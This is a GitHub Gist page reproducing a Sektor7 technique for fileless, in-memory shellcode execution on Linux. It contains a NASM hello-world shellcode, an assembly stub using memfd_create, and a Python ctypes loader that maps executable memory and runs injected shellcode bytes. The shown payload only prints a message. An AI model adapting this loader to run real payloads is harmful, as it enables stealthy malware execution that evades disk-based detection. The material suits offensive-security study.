Last active
June 24, 2022 21:19
-
-
Save Und3rf10w/b2d4aa07856ab6bfadce86f19e41e38f to your computer and use it in GitHub Desktop.
Sektor7 In memory shellcode injeciton from https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bits 64 | |
| global_start | |
| _start: | |
| jmp short message | |
| print: | |
| pop rsi | |
| xor rax,rax | |
| mov al, 1 | |
| mov rdi, rax | |
| xor rdx, rdx | |
| add rdx, mlen | |
| syscall | |
| exit: | |
| xor rax, rax | |
| add rax, 60 | |
| xor rdi, rdi | |
| syscall | |
| message: | |
| call print | |
| msg: db 'Ex nihilo nihil fit!', 0x0A | |
| mlen equ $ - msg |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BITS 64 | |
| global _start | |
| section .text | |
| _start: | |
| ; duplicate FDs: 10 and 11 | |
| xor rax, rax | |
| xor rdi, rdi | |
| mov di, 10 | |
| mov rax, 0x20 | |
| syscall | |
| ; create an in-memory only file (AAAA) | |
| memfd_create: | |
| push 0x41414141 | |
| mov rdi, rsp | |
| mov rsi, 0 | |
| mov rax, 319 | |
| syscall | |
| ; 'suspend' the process | |
| pause: | |
| mov rax, 34 | |
| syscall | |
| ; this should never be reached | |
| exit: | |
| xor rax, rax | |
| add rax, 60 | |
| xor rdi, rdi | |
| syscall |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ctypes import (CDLL, c_void_p, c_size_t, c_int, c_long, memmove, CFUNCTYPE, cast, pythonapi) | |
| from ctypes.util import ( find_library ) | |
| from sys import exit | |
| PROT_READ = 0x01 | |
| PROT_WRITE = 0x02 | |
| PROT_EXEC = 0x04 | |
| MAP_PRIVATE = 0x02 | |
| MAP_ANONYMOUS = 0x20 | |
| ENOMEM = -1 | |
| SHELLCODE = | |
| '\xeb\x1e\x5e\x48\x31\xc0\xb0\x01\x48\x89\xc7\x48\x31\xd2\x48\x83\xc2\x15\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31' \ | |
| '\xff\x0f\x05\xe8\xdd\xff\xff\xff\x45\x78\x20\x6e\x69\x68\x69\x6c\x6f\x20\x6e\x69\x68\x69\x6c\x20\x66\x69\x74\x21\x0a' | |
| libc = CDLL(find_library('c')) | |
| #void *mmap(void *addr, size_t len, int prot, int flags, int fildes, off_t off); | |
| mmap = libc.mmap | |
| mmap.argtypes = [ c_void_p, c_size_t, c_int, c_int, c_int, c_size_t ] | |
| mmap.restype = c_void_p | |
| page_size = pythonapi.getpagesize() | |
| sc_size = len(SHELLCODE) | |
| mem_size = page_size * (1 + sc_size / page_size ) | |
| cptr = mmap(0, mem_size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) | |
| if cptr == ENOMEM: exit('mmap() memory allocation error') | |
| if sc_size <= mem_size: | |
| memmove(cptr, SHELLCODE, sc_size) | |
| sc = CFUNCTYPE(c_void_p, c_void_p) | |
| call_sc = cast(cptr, sc) | |
| call_sc(None) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment